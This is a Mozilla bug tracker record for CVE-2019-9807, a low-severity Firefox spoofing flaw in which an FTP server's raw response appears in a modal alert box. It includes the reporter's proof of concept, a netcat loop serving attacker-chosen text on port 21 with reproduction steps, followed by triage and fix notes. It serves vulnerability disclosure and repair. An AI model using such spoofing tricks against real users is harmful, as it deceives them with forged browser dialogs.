Closed Bug 1362050 (CVE-2019-9807) Opened 3 years ago Closed 1 year ago

FTP allows window modal alert box with attacker controlled input


(Core :: Networking: FTP, defect, P3)




Tracking Status
firefox65 --- wontfix
firefox66 --- fixed
firefox67 --- fixed


(Reporter: hanno, Assigned: Gijs)


(Blocks 1 open bug)


(Keywords: csectype-spoof, sec-low, testcase, Whiteboard: [necko-triaged][adv-main66+])


(1 file)

Attached file ftpalert.htm
When one sends garbage over the ftp port 21 and tries to access it via firefox + then tries to reload it will create an alert box with the garbage as content.

I'm attaching a poc. Use it by first starting a dummy "garbage ftp server" on localhost with netcat:
while true; do echo "I can control your popup window content" | nc -l -p 21; done

And then open the html file.

I don't see why this behavior makes any sense. It seems some kind of error handling, however it's missing any explaining error message and just puts all content that came over the ftp port in an alert box. It allows bypassing restrictions of window modal alert boxes, which usually webpages shouldn't be able to control.
(In reply to Hanno Boeck from comment #0)
> It allows bypassing
> restrictions of window modal alert boxes, which usually webpages shouldn't
> be able to control.

What restrictions are you talking about? We still display realm information on http auth dialogs (as do most browsers, I believe), and per-window-modal (rather than tab-modal) dialogs for alert(), prompt() etc. are only a pref flip away (and there are reasons you might want to flip that pref, such as bug 727801).

I'm not convinced there's a realistic security vulnerability here that needs to stay hidden, but I'll leave the decision up to Al & Dan & co.

Also: maybe a dupe of (public) bug 1282430? Hard to tell.
Group: firefox-core-security → core-security
Component: Security → Networking: FTP
Product: Firefox → Core
This isn't the http auth dialog, it's a 2000-era modal window so it's potentially a bypass of alert-abuse prevention and maybe a bypass on the restrictions against sandboxed frames popping up alerts.
Group: core-security → network-core-security
Can't reproduce with the test case.
Whiteboard: [necko-backlog]
(In reply to Honza Bambas (:mayhemer) from comment #3)
> Can't reproduce with the test case.

Hanno, it seems you missed this comment a month ago.
Can you re-test?
Flags: needinfo?(hanno)
It seems the Javascript reproducer doesn't work very reliable.

However there is a reliable way to reproduce this "manually":

1. Run the nc "fake ftp server":
while true; do echo "I can control your popup window content" | nc -l -p 21; done

2. Call ftp://localhost/
Firefox will try to load it.

3. go into the URL bar and press enter again.

This works always for me. It is probably possible to get a more reliable way in javascript to simulate this. But the main point should be obvious: Firefox sometimes creates alert boxes with random content coming from the server and without any explanation. That surely doesn't seem like correct behavior.
Flags: needinfo?(hanno)
I could verify the test case reproduces reliably. Back to Honza
Flags: needinfo?(honzab.moz)
Keywords: testcase
Jason, could you please find an owner?  I'm not sure who is responsible for the FTP code these days.  Thanks.
Assignee: nobody → jduell.mcbugs
Flags: needinfo?(honzab.moz)
Given that there's no visible activity on fixing this and it's been open several months I intend to disclose this bug within a week.
Priority: -- → P3
Whiteboard: [necko-backlog] → [necko-triaged]
Assignee: jduell.mcbugs → nobody
Duplicate of this bug: 1519521

Someone filed a dupe and there's a public blogpost, should we open this up to increase the chance someone might provide a patch?

Flags: needinfo?(dveditz)
Group: network-core-security
Flags: needinfo?(dveditz)

Fixed in bug 1523249.

Assignee: nobody → gijskruitbosch+bugs
Closed: 1 year ago
Resolution: --- → FIXED
Whiteboard: [necko-triaged] → [necko-triaged][adv-main66+]
Alias: CVE-2019-9807
You need to log in before you can comment on or make changes to this bug.